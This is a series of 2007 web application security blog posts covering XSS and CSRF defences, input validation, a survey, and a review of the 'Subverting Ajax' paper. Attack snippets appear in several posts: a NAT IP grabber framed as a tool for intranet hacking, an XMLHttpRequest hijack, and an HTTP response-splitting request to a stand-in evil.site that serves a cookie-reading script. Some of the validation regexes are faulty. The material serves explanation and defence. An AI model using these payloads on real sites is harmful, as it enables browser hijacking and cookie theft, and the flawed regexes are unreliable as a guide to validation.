Wednesday, January 31, 2007

Goodbye Applet, Hello NAT'ed IP Address

To perform some Intranet Hacking we need the web browser's internal NAT'ed IP Address (ie: 192.168.xxx.xxx). While not the most elegant solution, Java Applets (MyAddress) are the only real way to go. It turns out JavaScript can invoke Java classes directly (Firefox), including java.net.Socket, and can achieve same results. No Applet required making the proof-of-concept code a lot easier.

Firefox Only! (1.5 – 2.0) tested on OS X and WinXP. Please me know if anyone knows a way to invoke Java classes from JavaScript in Internet Explorer.

function natIP() {
var w = window.location;
var host = w.host;
var port = w.port || 80;
var Socket = (new java.net.Socket(host,port)).getLocalAddress().getHostAddress();
return Socket;
}



I hot-wired a version into this oversized form button

Tuesday, January 30, 2007

The difference between Security Assessments and Penetration Tests

Update 02/02/2007: The Mike Rothman (Pragmatic CSO) posted a simple way to explain the differences and also provides further insights. "Assessments give you an idea about all the POTENTIAL holes. Pen tests prove whether the holes are in fact actionable."

Security Assessments
and Penetration Tests are infosec industry terms commonly and erroneously used interchangeably. This causes confusion for business owners who are trying to figure out what solution they need to protect their Web businesses. For starters, security assessments are thorough evaluations of a website to validate security posture and/or detect ALL the possible weaknesses. Penetration tests simulate a controlled (internal/external) bad guy website break-in with the goal of achieving a certain level of system/data access. Both methods are acceptable and add a lot of benefit if implemented properly and at the right time.

Security Assessments
There are number of methodologies for performing website security assessments including black box vulnerability assessments, source code reviews, threat modeling, configuration audits, etc. and some engagements may use combinations. Security assessments are invaluable for understanding what you own and the current security posture. This information is helpful in making educated decisions and applying the appropriate resources that’ll make the most meaningful impact.

Penetration Tests
A pen-test team’s job is to break into a website, using whatever parameters they’ve been given, and gain access to the designated data they shouldn’t be able to obtain. They’ll exploit whatever vulnerabilities they need, but they’re NOT responsible for finding all the issues. The benefit is understanding how resilient your website is to determined attackers. At the end you should have interesting results and purpose built exploit code examples that tell a compelling story.

Expectations
The trick to choosing between the two is really understanding your business needs, requirements, and the value of what your’re protecting. If there is any resource to help you do that, it’s Pragmatic CSO. For those new to web application security, assessments are the way to go. Statistically most websites are known to be insecure so a pen-test isn’t going to be of much value at the start and you’d be better served by something more comprehensive. The second trick is properly setting the scope between you and the vendor which may include IP ranges, hostnames, level of testing depth, time frame, frequency, costs, reporting, solutions, re-testing, etc.

Evolution
The rate of web application code change remains unrelenting and still only a relatively small percentage of websites are in fact professionally tested for security. As anyone can imagine this drastically increases the likelihood of security vulnerabilities and eventually leads to compromise. Good news for criminals, bad news for customers and website owners. Thankfully there’s been a marked improvement of widely disseminated knowledge and a larger awareness of web application security issues. Web application security is no longer a dark and mysterious art only known to a select few insiders. Novices, with no more skill beyond they’re web browser, now easily master powerful tricks-of-the trade from readily available books and whitepapers.

Two things that stand out in my mind:

1) Security assessment methodology has increased from a few thousands unique tests to tens-of-thousands on the average website.
2) The technical skills required to perform a good security assessment has actually increased rather than diminished!


Conclusion: Experience Counts
To comprehensively assess the security of a website, a tester must be adept at the known 24 classes of attack (WASC Threat Classification). Additionally, they need to be comfortable in applying potentially hundreds of attack combinations described in scattered books and research papers. This type of expertise is developed over time while exposed to hundreds of assessments and practicing exploiting real-world websites. You want someone understands your business and provide value in those terms.

Qualified security testers need the necessary skills to recommend appropriate solutions in a variety of given situations. Every website’s security requirements are different and the particular circumstances must be taken into consideration. Identical vulnerabilities may be resolved in any number of acceptable ways. The testers job is to find the right combination of solutions to effectively mitigate risk. Otherwise you may end up with a time consuming and expensive false sense of security.

The best testers are familiar with a few operating systems (Unix variants, Windows), several programming languages (Java, C, Perl, ASP, PHP, C#, HTML, JavaScript), a couple web servers (Apache/Microsoft IIS/iPlanet), some application servers (ASP.NET, J2EE, ColdFusion, WebSphere, etc.), and a handful of databases (MySQL, Oracle, Access, SQLServer). In web application security, experience counts and it’s become essential to work in teams.

Input validation or output filtering, which is better?

This question is asked regularly with respect to solutions for Cross-Site Scripting (XSS). The answer is input validation and output filtering are two different approaches that solve two different sets of problems, including XSS. Both methods should be used whenever possible. However, this answer deserves further explanation.

Input Validation
(aka: sanity checking, input filtering, white listing, etc.)
Input validation is one of those things ranted about incessantly in web application security, and for good reason. If input validation was done properly and religiously throughout all web application code we’d wipe out a huge percentage of vulnerabilities, XSS and SQL Injection included. I’m also a believer that developers shouldn’t have to be experts in all the crazy attacks potentially thrown at a websites. There’s simply too much to learn and their primary job should be writing new code, not to become web application hackers. Developer should only have to concern themselves with the solutions required to mitigate any attack no matter what it might be. This is where input validation comes in play.

Input validation should be performed on any incoming data that is not heavily controlled and trusted. This includes user-supplied data (query data, post data, cookies, referers, etc.), data in YOUR database, from a third-party (web service), or elsewhere. Here are the steps that should be performed before any incoming data is used:

Normalize
URL/UTF-7/Unicode/US-ASCII/etc decode the incoming data.

Character-set checking
Ensure the data only contains characters you expect to receive. The more restrictive the rules are the better.

Length restrictions (min/max)
Ensure the data falls within a restricted minimum and maximum number of bytes. Limit the window of opportunity for an attacks as exploits tend to require lengthy input strings.

Data format
Ensure the structure of the data is consistent with what is expected. Phone should look like phone numbers, email addresses should look like email address, etc.

Regular expression examples with iteratively more restrictive security:
(These are just samples, not recommended for production use)

Phone number:

/* 555-555-5555 */

String phone = req.getParameter(”phone”);

/* character-set OK */
String regex1 = “^([0-9\-]+)$”;


/* character-set with length restrictions */

String regex2 = “^([0-9\-]{12})$”;

/* with data format restrictions */
String regex3 = “^([0-9]{3})(\-)([0-9]{3})(\-)([0-9]{4})$”;
if (phone.matches(regex3)) {

/* data is ok, do stuff... */

}

Email Address:

/* user@somehostname.com */
String email = req.getParameter(”email”);

/* character-set */
String regex1 = “^([0-9a-ZA-Z@\.\-]+)$”;

/* character-set with length restrictions */
String regex2 = “^([0-9a-ZA-Z@\.\-]{1,128})$”;

/* with data format restrictions */
String regex3 = “^([0-9a-ZA-Z\.\-]{1,64})(@)([0-9a-ZA-Z\.\-]{1,64})
(\.)([a-zA-Z]{2,3})$”;

if (email.matches(regex3)) {

/* data is ok, do stuff... */

}


Implementation
For a variety of reasons input validation has proved time consuming, prone to mistakes, and easy to forget about. The best approach is defining all the expected application data-types (account ID’s, email addresses, usernames, etc.), abstract them into reusable objects, and made easily available from inside the development framework. Input validation is all handled behind the scenes, no need to parse URLs, or remember to apply all the relevant business logic rules. The benefit to this approach is security becomes consistent and predictable. Plus developers are assisted is creating software at faster rate. Security and business goals are in alignment, which is exactly the place you want to be.

For example, let’s say you’re in an objected oriented environment working with a product purchase process:

URL:
http://website/purchase.cgi

Post Data:
product=100&quanitiy=4&cc=4444333322221111&exp=01/08

// Check if the user is properly logged-in and their account is active
if (user.isActive) {

// make sure the product is available in the requested quantity

if (req.product.isAvailable) {

// calculate the total purchase price
var total = req.product.price * req.qty;

// make sure the credit card is valid for the purchase total
if (req.creditcard.isValid(total)) {

// initiate the transaction
processOrder(user, req.product, req.qty, total, req.creditcard);

} else {

// inform user that their credit card was not accepted with a consistent message and also log the error to central database.
requestFailed(req.creditcard.error);

}

} else {

// inform user that items is not available with a consistent message and also log the error to central database.
requestFailed(req.product.error);

}

} else {

// inform user that they are not properly logged-in with a consistent message and also log the error to central database.
requestFailed(user.error);

}


Notice in the example code there is no input validation, direct database calls, or implicit strings. Everything is handled behind the scenes by the objects and methods. This makes mistakes less likely to occur and extremely helpful in preventing a wide variety of attacks including XSS, SQL Injection, and more.

Output Filtering
When you get right down to it, XSS happens on output when the unfiltered data hits the user (victim) web browser. Plus untrusted data may originate from a variety of locations, including your own database. As a developer you’re never really certain if someone else is doing their job and placing potentially malicious data in the DB. Better to play it safe when printing to screen.

Control the output encoding
Don’t let the web browser guess at a web pages content encoding. They’re known for making mistakes that could lead to strange XSS variants. There are two ways to set encoding, response header and meta tags. Its best to use both methods to make certain the browser gets it right.

Response Header:
Content-Type: text/html; charset=utf-8
or
Content-Type: text/html; charset=iso-8859-1

Meta Tags:
<* meta http-equiv="Content-Type" content="text/html; charset= utf-8">
or
<* meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

Removing HTML/JavaScript
Many of the languages and frameworks have their own methods to convert special characters in their equivalent HTML Entities, it’s probably best to use one of those. If not, here is Perl regex snippet that can be used or ported. I welcome anyone to comment on libraries they like, I’m not familiar and up to date with all of them. As with input validation its best to abstract this layer and make it second nature for developers.

$data =~ s/(<|>|\"|\'|\(|\)|:)/'&#'.ord($1).';'/sge;
or
$data =~ s/([^\w])/'&#'.ord($1).';'/sge;

Wednesday, January 24, 2007

Picking Brains Interview

I recently did a Picking Brains With...Jeremiah Grossman, interview with Ronald van den Heetkamp of Jungsonn Studios (who goes by the name Jungsonn). "Picking Brains With..." is a collection of interviews Jungsonn is starting to put together with various experts in the industry. He asks them a series of infosec related questions, and zip zap, your done. I thought it would be fun, so I figured, why not!

Interviewed for the StillSecure Podcast

This week I appeared a Podcast (my first ever), with the Alan Shimel and Mitchell Ashley of StillSecure, After all these years. Let me tell you these guys rock! Alan and Mitchell are a lot of fun, simply hilarious, and know what they’re talking about too! Making it hard to believe these guys are honest ta'goodness infosec experts. They asked for my thoughts on the web application security industry, specifically vulnerability assessment. I had a great time and hopefully I’ll get to do it again in the future. In the meantime I might have to go back through their audio archive and seem what they've done in the past.

Monday, January 22, 2007

RSnake, Microsoft, XSS... Oh my!

RSnake leaked that other day that he's been having a positive dialog with MS about browser security. He said MS seems genuinely interested about adding more anti-XSS features into IE7. All I got to say is WOW! FINALLY someone is listening. Thank you! Few people know the issues as well as he. Here's the thing I worry about…if MS does a good job at helping the user protect themselves against XSS, I might have to switch browsers and recommend people do the same. That’s a lot of crow to eat. :) Hey Mozilla/Firefox developers, little help here!

Preventing CSRF when vulnerable to XSS

*The following code and concepts should be considered highly experimental and should be considered a work in progress. Not to be used for production websites.*

Web Worms (like Samy) targeting social networking websites (like MySpace) typically involve combining two attacks, Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). An attacker posts JavaScript Malware (Web Worm) to their user profile web page because the website allows user-supplied HTML and the input filters didn’t catch the offending code. When a logged-in user visits the infected profile web page their browser is hi-jacked (user XSS’ed) to “friend the attacker” and post of copy the Web Worm code to their profile (user CSRF’ed) causing self-replication. There is no “Cross-Site” as part of the forged requests as CSRF implied, but that conversation is for another time.

As was case for MySpace and many other website, important features such posts to a user profile and friend’ing users, are protected from CSRF using session tokens embedded in URL’s or HTML Forms. Requests aren’t valid without a token. To defeat the CSRF solution, Web Worms first request a third-party page (on the same domain) to get a valid token and use it as part of a forged request. Since the attack is on the same domain, access to session tokens is can be easily achieved. This is why many people, including myself, have believe that CSRF solutions can be defeated when XSS vulnerability exist on that domain. However, there may be something we can do.


Without using browser exploits, JavaScript only has a few ways to access HTML data from another page on the same domain. Generally speaking, if we can prevent JavaScript on an XSS’ed web page from being able to read in session tokens from other pages, we might have something worth pursuing.

XMLHttpRequest
window.open
IFrame

If we can remove access these API’s, we may be able to prevent or make it harder for JavaScript Malware to bypas CSRF security. Enter prototype hijacking. The following proof-of-concept code effectively does this when called first at the top of the web page.

PoC Code is (Firefox ONLY!) Should this method be found workable, we can port examples to other browsers, namely Internet Explorer.

1) XMLHttpRequest

The Samy Worm used this method. This following function overwrites the XMLHttpRequest constructor so it has no functionality of any kind.

function XMLHttpRequest() { }

By calling XHR after this point:

var req = new XMLHttpRequest();
req.open('GET', 'http://website/', true);

Results in the following error message:

Error: req.open is not a function

I’ve not been able to find a way to restore XHR’s functionality


2) window.open

A Web Worm could feasibly open a small, but hidden new window and read the session token out of that. Impose the following line:

window.__defineGetter__("open", function() { });

By calling window.open after this point:

window.open("http://website/",null,"");

Results in the following error message:

Error: window.open is not a function

Again, have found no way to restore window.open

3) IFrame

There are a couple of ways to create IFrames from JavaScript, createElement and document.write. Overwriting these constructors is the same as the previous examples.

document.__defineGetter__("write", function() { });
document.createElement = function () {}


There are a couple of things to note here:
  • Any mechanism I have missed, the constructor should be able to be overwritten.
  • The model break down if the XSS'ed web page requires any of these constructors.
  • I have not yet explored if Flash, JScript, VBScript can be used as a substitute for JavaScript to retrieve session tokens.

Like I said, a work in progress, but fun none the less :)

Friday, January 19, 2007

Read the ingredients

Bill Pennington passed this along to me this morning.

Recording/Slides for Top 10 Web Hack of 2006

Webinar Slides [PDF] and WebEx Recording [Reg. Required] released. Thanks again to RSnake and Robert Auger for helping build the list.

Attacks always get better, never worse. 2006 was a significant year for website hacking. “Hack” is the term used loosely to describe some of the more creative, useful, and interesting techniques / discoveries / compromises.


In this Webcast, WhiteHat Security founder and CTO, Jeremiah Grossman will look back on what was discovered – he’s collected as many of the new 2006 web hacks as could be found and narrowed the list to the Top 10. With issues ranging from XSS, confusion over AJAX and Javascript vulnerabilities, and more, it’s sure to be an informative discussion.


* Reveal the top 10 attacks of 2006 by creativity and scope

* Predict what these attacks mean for website vulnerability management in 2007

* Present strategies to protect your corporate websites

Thursday, January 18, 2007

Low-Hanging Fruit, Non-Sense

Dr. Nick: "With my new diet, you can eat as much as you want, any time you want!"
Marge: "And you'll lose weight?"
Dr. Nick: "You might! It's a free country!"
Dr. Nick Riviera (The Simpsons)

A common approach to vulnerability assessment (VA) is going after the so-called “low-hanging fruit" (LHF). The idea is to remove the easy stuff making break-ins more challenging without investing a lot of work and expense. Nothing wrong with that except eliminating the low-hanging fruit doesn't really do much for website security. In network security the LHF/VA strategy can help because that layer endures millions of automated and untargeted attacks using “well-known” vulnerabilities. Malicious attacks on websites are targeted using one-off zero-day vulnerabilities carried out by a real live adversary(ies).

Let’s say a website has 20 Cross-Site Scripting (XSS) vulnerabilities, 18 of which classifiable as LHF. Completing a LHF/VA process to eliminate these might take a week to a month or more depending on the website. By eliminating 90% of the total issues, how much longer might it take a bad guy to identify the one of the two remaining XSS issues they need to hack the site? An hour? A few? A day? Perhaps a week if you’re really lucky. A recent thread on sla.ckers.org offered a perfect illustration.

Someone said vulnerabilities in Neopets, a popular social network gaming site for virtual pets, were hard to come by. The first question was who cares about Neopets? The answer was it has millions of players and currency with monetary value. Through my browser I could almost hear the keyboards as the members raced to be the first. A dozen posts and 24 hours later a XSS disclosure hit. I didn’t bother confirming. sla.ckers.org has already generated over 1,000 similar including several in MySpace, so it wouldn’t be out of the ordinary. However, these are also not the guys we need to be worrying about.

The real bad guys are after the money. They have all day, all night, every day, weekends and holidays to target any website they want. In the above example, we were just talking about some silly gaming site. What if the target was something more compelling? Think the real bad guys will be so nice as to publish their results? They’d bang on a system 24x7 until they got what they wanted and happily be on their way. Reportedly the group that hacked T-Mobile and Paris Hilton’s cell spent more than a year targeting the system.

The point I’m trying to make is if your going to spend weeks and months of time finding and fixing vulnerabilities make sure the end result protects you for more than a lucky week. Sure going after LHF is better than nothing, but if you’re a professional responsible for security, that’s the last thing you want to tell your boss your VA strategy is based on. The strategy you want is comprehensiveness. Push the bad guys away for months, years, or hopefully forever.

Tuesday, January 16, 2007

Cross-Site Request Forgery (CSRF/XSRF) FAQ

The Cross-Site Request Forgery (CSRF/XSRF) FAQ has been released! Good stuff.

What is Cross Site Request Forgery?
"Cross Site Request Forgery (also known as
XSRF, CSRF, and Cross Site Reference Forgery) works by exploiting the trust that a site has for the user. Site tasks are usually linked to specific urls (Example: http://site/stocks?buy=100&stock=ebay) allowing specific actions to be performed when requested. If a user is logged into the site and an attacker tricks their browser into making a request to one of these task urls, then the task is performed and logged as the logged in user. Typically you'll use Cross Site Scripting to embed an IMG tag or other HTML/JavaScript code to request a specific 'task url' which gets executed without the users knowledge. These sorts of attacks are fairly difficult to detect potentially leaving a user debating with the website/company as to whether or not the stocks bought the day before we initiated by the user after the price plummeted."

read more...

Thursday, January 11, 2007

WASC Meetup at RSA (San Francisco 2007)

If your going to RSA and want to meet-up with the webappsec crowd, here's your chance.

This years RSA Conference is being held at the San Francisco Moscone Center (February 5 – 9) and every year, for the past couple years, we’ve coordinated an informal WASC Meet-Up. Usually about 20 or so people in the web application security community show up to have some fun sharing drinks, appetizers, conversation, and few laughs. It’s a great opportunity to see people that we only otherwise communicate with virtually. Everyone is welcome and please drop me a note if you plan on coming:

jeremiah__ a-t __ whitehatsec.com

Place:
Jillian's
(Walking distance from the conference)

101 4th Street, Suite 170
San Francisco, CA 94103
Phone: 415.369.6100

Time: Wed, Feb. 7 @ 12:30pm

Wednesday, January 10, 2007

Disclosure 2.0

Recently I’ve been discussing how vulnerability discovery is more important than disclosure. And also how website owners are going to have to deal with the disclosure whether they like it or not. Scott Berinato’s (CSO), The Chilling Effect, just posted a very well-written article describing the current web security environment and where we’re heading. Definitely worth the read and RSnake has posted his comments.

From the experts:

Dr. Pascal Meunier (Professor, Purdue University)

“He ceased using disclosure as a teaching opportunity as well. Meunier wrote a five-point don't-ask-don't-tell plan he intended to give to cs390s students at the beginning of each semester. If they found a Web vulnerability, no matter how serious or threatening, Meunier wrote, he didn't want to hear about it.”


Rsnake (ha.ckers.org and sla.ckers.org)

“RSnake doesn't think responsible disclosure, even if it were somehow developed for Web vulnerabilities (and we've already seen how hard that will be, technically), can work.”


Jeremiah Grossman (CTO, WhiteHat Security)

"Logistically, there's no way to disclose this stuff to all the interested parties," Grossman says. "I used to think it was my moral professional duty to report every vulnerability, but it would take up my whole day."


Chris Wysopal (CTO, VeriCode)

“… responsible disclosure guidelines, ones he helped develop, "don't apply at all with Web vulnerabilities."


Jennifer Granick (Stanford's Center for Internet and Society)

“Granick would like to see a rule established that states it's not illegal to report truthful information about a website vulnerability, when that information is gleaned from taking the steps necessary to find the vulnerability, in other words, benevolently exploiting it.”

Tuesday, January 09, 2007

Drawing a line in the "Scan"

Normally I don’t post shameless company promotions on my blog, but this one is different. I thought people might find it interesting to follow the results. Commercial web application scanner vendors (Cenzic, SPI Dynamics, Watchfire, etc.) and service providers like myself from WhiteHat Security go back and forth with claims about what scanning technology can and can’t find. I say scanning is only capable of testing for about half of the issues (technical vulns) – they claim they find logical flaws. Who’s right? It's time to find out.

Enterprises are incentivized to select the best solution to find exactly where the vulnerabilities are. That’s where the focus should be. We all loathe reading lame paid-for 4-star reviews and bogus magazine awards. It’s 2007, and I say it's time to let the results speak for themselves. The hard part about measuring results is you never really know the total number of vulnerabilities present in custom web applications, and demo sites are a poor baseline for measurement. The best results are gathered using real websites when solutions go head-to-head, but obviously you just can't go out and pen-test any website you feel like.

As it happens a large portion of our Sentinel customers, with some of the largest and most popular websites in the world, previously purchased commercial scanners. They said they were complex, reported too many false positives, or the assessments were faster to do by hand. *Survey results back this up* Its not that the tools don’t work. They’re sophisticated and ended up not being the right solution for the job. Unfortunately many others in a similar situation are hesitant to try something new for fear of throwing away good money after bad. Worse still, their websites remain unprotected and head-to-head comparisons between competing solutions become few and far between.

Our results are better, but I'm not here asking people to take my word for it. I have something else in mind. Here's the deal: If someone previously purchased a commercial scanner and ended up not using it, not liking it, or curious about alternatives they can receive up to a $30,000 credit towards an annual Sentinel subscription. Completely risk-free. They'll see our results first hand on their website for comparison against their current scanner reports. (Full details) The enterprise gets to decide what can and can’t be scanned for. Win or lose or draw, good or bad or otherwise - we're all going to learn something.

Automated Scanner vs. The OWASP Top Ten

The challenges of automated web application vulnerability scanning is a subject of frequent debate. Most websites have vulnerabilities, a lot of them, and we need help finding them quickly and efficiently. The point of contention revolves around what scanners are able to find, or not. Let's clear something up: Scanners don't suck, well some do, but that's not the point I'm making. My business is actually reliant upon leveraging our own vulnerability scanning technology. What I’m describing is setting proper expectations of what scanners are currently capable of on how it affects the assessment process.

Download: Automated Scanner vs. The OWASP Top Ten [reg required]

"The OWASP Top Ten is a list of the most critical web application security flaws – a list also often used as a minimum standard for web application vulnerability assessment (VA) and compliance. There is an ongoing industry dialog about the possibility of identifying the OWASP Top Ten in a purely automated fashion (scanning). People frequently ask what can and can’t be found using either white box or black box scanners. This is important because a single missed vulnerability, or more accurately exploited vulnerability, can cause an organization significant financial harm. Proper expectations must be set when it comes to the various vulnerability assessment solutions."

Monday, January 08, 2007

Review of the Subverting Ajax white paper

Stefano Di Paola and Giorgio Fedon’s paper and presentation’s meteoric rise to fame was due to its disclosure of the “Universal XSS vulnerability in Adobe’s Acrobat Reader Plugin”. Ironically that was a very small part of the overall content. The content is highly advanced and assumes a lot of webappsec knowledge (XSS, JavaScript, CSRF, Splitting, and Smuggling), definitely not read for beginners. Now, normally I refrain from “publicly reviewing” white papers. I either read or write them, but how could I ignore Thomas Ptacek’s request for a “characteristically excellent post”. Flattery works every time. :) here goes:

Separate from the Universal XSS two main attacks are described, XSS Prototype Hijacking and Auto Injecting Cross Domain Scripting (AICS). Both attacks target websites using Ajax and assume their victim has already been XSS’ed. Or, as I like to put it, infected with JavaScript Malware. The rest of the payload comes after that point and what a bad guy could do. And speaking of Ajax, I’ve already published my view on subject, so here’s what the authors have to say:

“Applications based upon Ajax are affected by the same problems of any other web application, but usually are more complex because of their asynchronous nature.”

Fair enough. Not sure I agree, but it’s not a vital topic for our purposes here. Lets move on.

XSS Prototype Hijacking
To leverage the example from the paper: The victim has been XSS’ed during a visit to a web bank that uses Ajax (XMLHttpRequest) for funds transfer. The JavaScript Malware overwrites the XMLHttpRequest object, which allows the attacker to transparently intercept and modify HTTP request/responses to the website. Sort of like an active sniffer in the browser DOM. The attacker could then initiate fraudulent transfers without the user’s knowledge. Interesting idea.

XMLHttpRequest.prototype.send = function (pay) {

// Hijacked .send
sniff("Hijacked: "+" "+pay);
pay=HijackRequest(pay);
return this.xml.send(pay);
}

Aside from not having seen any web bank using Ajax, the attack still could be plausible for other situations. The question I had is why would an attacker need to do this? Wouldn’t it be simpler to phish them with a login/password DOM overlay (Phishing with Superbait) or something else similar? Then I read this and thought a little differently:

“In this case, the attack is totally independent from any authentication system used such as One Time Passwords or RSA tokens.”


That’s a good point. Sometimes stealing credentials is useless and the attacker might need to modify the request/response data in real-time. It really depends on what they’re trying to achieve and on what site. While the act of overwriting JavaScript objects is not exactly new, my Gmail contact list hack was based on this technique, what these guys did was take it to the next level. This is one more technique that could come in handy down the road.

Auto Injecting Cross Domain Scripting (AICS)
“…an attacker could get total control over a website (which has a XSS vulnerability in it) by simply controlling an inner frame. If a browser is vulnerable to HRS this technique could be applied in a cross domain context every time a user opens a new page or exits from the browser, by injecting a new HRS. So even if a website in not vulnerable to XSS, it could be controlled.”

That’s quite a claim! The attack has two more requirements beyond XSS. The victim must be using a forward proxy and browser vulnerable to HTTP Response Splitting/Smuggling. I don’t know how common this scenario is, but let’s go with it anyway. If you recall Anton Rager’s XSS Proxy and my version based-on off that design, you’ll remember we achieved persistent control over a victim’s browser by using an invisible full-screen iframe. Whenever the victim clicked on the website, it was within the iframe, and we could monitor they’re activity. The limiting factor was if the victim traveled to another domain the thread of control was lost due to the same-origin policy.

Stefano and Giorgio said you could overcome the limitation by priming the browser with a Splitting attack initiated by XMLHttpRequest.

var x = new ActiveXObject("Microsoft.XMLHTTP"); x.open("GET\thttp://www.evil.site/2.html\tHTTP/1.1\r\nHost:\t www.evil.site\r\nProxy-Connection:\tKeep- Alive\r\n\r\nGET","/3.html",false);x.send();


A javascript request forged as in the previous code will send the following requests:

GET http://www.evil.site/2.html HTTP/1.1
Host: www.evil.site
Proxy-Connection:Keep-Alive
GET /3.html HTTP/1.1
Host: www.evil.site
Proxy-Connection:Keep-Alive

If the Splitting attack was successful, the victim’s proxy will see two requests and subsequently send back two responses. The second one being laced with JavaScript Malware from the evil website:

Response 1: http://www.evil.site/2.html:
<* html> <* body> foo <* /body> <* /html>

Response 1_2: http://www.evil.site/3.html:
<* html> <* head> <* meta http-equiv="Expires" content="Wed, 01 Jan 2020 00:00:00 GMT">
<* meta http-equiv="Cache-Control" content="public">
<* meta http-equiv="Last-Modified" content="Fri, 01 Jan 2010 00:00:00 GMT">
<* /head> <* body>
<* script>
alert("DEFACEMENT and XSS: your cookie
is"+document.cookie)
<* /script>
<* /body>
<* /html>

Here’s where the magic happens. From the (vulnerable) browser perspective only 1 request has been sent so the second response is queued up waiting. If the victim were to then visit http://webbank.com/, they be served up the second response and not the page from the real website. Ouch! Going back to the beginning with the XSS Proxy limitation, before the victim clicks to go off-domain, a Splitting request is primed waiting to serve up more JavaScript Malware from the evil website. And like the description said, the next website doesn’t necessarily need to be vulnerable to XSS. Clever!

Honestly I don’t know if this attack works, or how well, though I assume it does if you have the properly vulnerable set of software. I don’t see a reason why it wouldn’t.

Conclusion
Stefano and Giorgio deserve a lot of credit for their discoveries and I hope they keep at it. Personally I find this kind of cutting-edge web attack research fascinating, no matter how (im)-plausible it might end up. The fact is you never know when someone else might see something you don’t. For myself, it’s one of the coolest things when others find ways to improve upon my past work. That’s why I try to release as many little hacks as I can no matter how strange.

At end of the day this paper wont' force us to do anything else on the web server. Find and fix your cross-site scripting vulnerabilities. It does illustrate yet another reason why we need more browser security enhancements.




Web Application Security Professionals Survey (Jan. 2007)

Update 01/18/2007
The results are in and the people have spoken! Our goal was to capture the “thoughts” of the crowd and boy did it ever! The 59 (4 less than Dec 06) respondents shared their battleground views of web application security and in doing so presented interesting perspectives and great insights of a larger world. There is a huge amount of data inside and I couldn’t be more pleased with the results. We also unexpectedly created a database of the most popular vulnerability assessment tools and knowledge resources. Thank you to everyone who took the time to submit.

My Observations
  1. Most already predicted 2007 as the year of XSS, CSRF, and Web Worms. The survey validates this message. (Q5) (Q13) (Q15) Virtually all those who are webappsec savvy say the vast majority websites have serious security vulnerabilities (Q6), web browser security sucks (Q10), and believe most security professionals don’t realize it or understand why (Q4). Clearly we have some challenges ahead.
  2. An uncanny number of people identically answered “My Brain” as their top tool for finding vulnerabilities (Q12). Unsurprisingly the open source proxies are among the most popular software in the webappsec arsenal. And we have some real characters in the crowd that’s for sure. (Q14)
  3. Half of the web application security community has a background in software development (me too) and the other half is IT/NetworkSec (Q3). This is an interesting pairing as traditionally these two groups never really had cause to communicate with one another, let alone forced to work together. Such is the state of web application security. This is probably an unpopular opinion, but software developers seem to have a hard time respecting any solution beyond the code. While IT/NetworkSec types understand the best results come from a collection of risk mitigating solutions. We all should try to keep an open mind when new concepts and ideas arrive.
  4. There is split between how people view the impact or involvement of Ajax technology on website security (Q8). Half say Ajax opens some new attack vectors; the other side says it increases the attack surface. I’m of the opinion the Ajax In-Security discussion has more to do with a semantic debate rather than a misunderstanding of the technology. This is fine when we speak amongst ourselves in the webappsec community, but it causes a lot of confusion for those outside circle seeking education.
  5. People are cautiously optimistic of web application firewalls (Q9). Stopping attacks without having to fix the code certainly has its allure. To say nothing of the prospects of defense-in-depth. There are many out there though who’ve been soured by a bad experiences with crappy and/or older WAFs.
Its official, RSnake’s blog is the most popular place among the webappsec crowd (Q11). *applause* He’ll be making an appearance at the WASC meet-up during RSA to sign autographs. *grin*

Description
This monthly survey has become a really fun project. It's receiving great reviews and right when you think you know something, the answers to a couple questions reveal something unexpected. That's what we're really going for here. Exposing various aspects of web application security we previously didn't know, understand, or fully appreciate. From the last survey people said really enjoyed the "thoughts" from the crowd in the bonus question. We'll try to capture more of those this time around.

As always, the more people who submit data, the better the information will be. Please feel free to forward this email along to anyone that might not have seen it.

Guidelines
  • Survey is open to anyone working in or around the web application security field
  • Answer the questions in-line and if a question doesn’t apply to you, leave it blank
  • Comments in relation to any question are welcome. If they are good, they may be published
  • Email results to jeremiah __at__ whitehatsec.com
  • To curb fake submissions please use your real name, preferably from your employers domain
  • Submissions must be received by January 17, 2007

Publishing & Privacy Policy
  • Results based on aggregate data collected will be published
  • Absolutely no names or contact information will be released to anyone, though feel free to self publish your answers anywhere you’d like

Last Survey Results
December 2006


Questions

1) What type of organization do you work for?

a) Security vendor / consultant (60%)

b) Enterprise (9%)
c) Government (9%)
d) Educational institution (5%)
e) Other (14%)
No Answer (2%)


  • Agribusiness
  • My own webdevelopment company.
  • Health Care
  • I'm not telling. It's a publicly-held company, though.
  • Independant research and training
  • I work for none right now.
2) How would you rate your technical expertise in web application security?

a) Guru (21%)

b) Expert (47%)
c) Intermediate (28%)
d) Novice (2%)
e) I am Nessus (0%)
No Answer (2%)



  • Homestar says, "sewiousleeeee!"
3) What was your background before entering the web application security field?

a) Software Development (53%)

b) IT (16%)
c) QA (0%)
d) Product/Project Management (2%)
e) I'll never tell! (2%)
f) Other (please specify) (23%)
No Answer (2%)

  • technical sales in IT security
  • Penetration Tester
  • Information System Auditor
  • Network Penetration Testing
  • Network Security Engineer
  • New Hampshire mafia hitman/enforcer
  • An Electrical Engineering major, which i still am
  • Professional slacker/self taught
  • Before I started with the webappsec stuff I was a apprentice and there I had much to do with web development/design and IT at all.
4) From your experience, how many security professionals "get" web application security?


a) All or almost all (0%)

b) Most (19%)
c) About half (26%)
d) Some (49%)
e) None or very few (7%)


  • "To my experience the traditional "network security" guys still see WebAppSec as primarily a pet project or an oddity, at least in the government space. For example I am the only full time app sec engineer for a agency of about 8,000. If i had a staff of 10 we would still keep busy. "
  • "Most get web, since that's half of what the internet is (the other half is email). It's everything beyond the web that they don't get."
5) What are your thoughts about the Universal XSS vulnerability in Adobe’s Acrobat Reader Plugin?

a) Really bad (53%)

b) Bad (37%)
c) Never heard of it (2%)
d) Nothing new here, move along (5%)
e) Please stop with the FUD! (2%)



  • "It is certainly bad. Especially the bit with local file system access. But like all XSS vulnerabilities they have a high exploitability potential they are not that difficult to individually remediate (systematically is a whole different ball of wax)."
  • "What is really bad is the recommendations going around about how to fix this. Telling people to "upgrade their Acrobat" isn't the way to protect users NOW. Additionally, half the recommendations don't even account for the fact the information after a # sign in a URL is NOT sent back to the server, so the server side URL filtering jive isn't going to fix anything when it boils down to PDFs. In fact, this vulnerability is similar to just entering in "javascript:alert('xss')" in the address field of the browser -- the script runs, but it obviously would not be mitigated by running server side validation. The best approach I've seen is to change the MIME type sent back from the server from "pdf/application" to "pdf/octet" and also to add a "Content-Disposition: Attachment" header for outbound PDFs which prompts the user to download the PDF rather than running it in the browser."
  • "truly the best candidate for the most widespread worm to utilize"
